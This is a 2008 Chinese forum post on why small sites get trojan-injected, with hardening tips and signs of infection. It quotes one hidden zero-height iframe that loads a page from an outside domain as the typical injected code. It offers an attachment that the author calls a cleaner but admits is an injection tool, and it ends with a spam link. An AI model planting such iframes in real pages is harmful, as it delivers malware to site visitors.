bluehanger 2008-10-6 00:17
为什么网站能被"坏"人打包挂马?
1.很多企业站开发出来默认的用户密码admin, 到别人打包你站的时候还是这个密码,你说你网站拿这密码干什么?
2.还有的数据库文件尾巴是.mdb的,别人如果拿过这样的程序,或知道你使用的什么管理系统,下载你数据库,登陆你后台"工作".建议把后缀名.mdb 改成 .asp
3.如果你是企业站建议你更新完网站后删除后台目录,这一招很绝,就算别人知道密码又怎样?!前提是你要备份后台目录哦!
以上工作完成后,下载一个网马扫描安全助手扫描一下,网站目录里是否存在漏洞或木马程序,如果你不知道怎么操作,建议你找个信誉好的"黑客"帮你把漏洞补了.
[b]如何判断网站是否挂马?[/b]
一般被挂马的网站打开网页会感觉到网页卡一下,这种情况你得小心了,如果自己电脑装了杀毒软件的还好,没装的可能你就要准备重装系统了.[color=blue]大家所说的病毒就是这样来的!!![/color]
挂马代码特征以<iframe开头 </iframe>结尾的代码,比如说<iframe src=http://www.love0452.com/xxx.htm width=50 height=0 border=0></iframe>这种代码就是别人恶意挂的马了.
[b]如果你整站都被挂了这样的马怎么办吗?[/b]
那你就要去找个批量清马的工具了,附件里面有清马的工具,其实这清马的工具就是挂马的工具拉!
如果批量清马不成功怎么办吗? 你可以用 <% '此马以清 %> 批量替换木马,然后替换完了你在批量清除就对了!!
[url=http://www.ydaima.com/]本站提供大量商业完整源码免费下载![/url]
附件[img]http://www.love0452.com/download.php?ml=0808&file=/90864_20081007001655_1.gif[/img][url=http://www.love0452.com/download.php?ml=0808&file=/90864_20081007001655_1.rar]清马工具.rar[/url][i](49.1 KB)[/i]2008-10-7 00:13, 下载次数: 0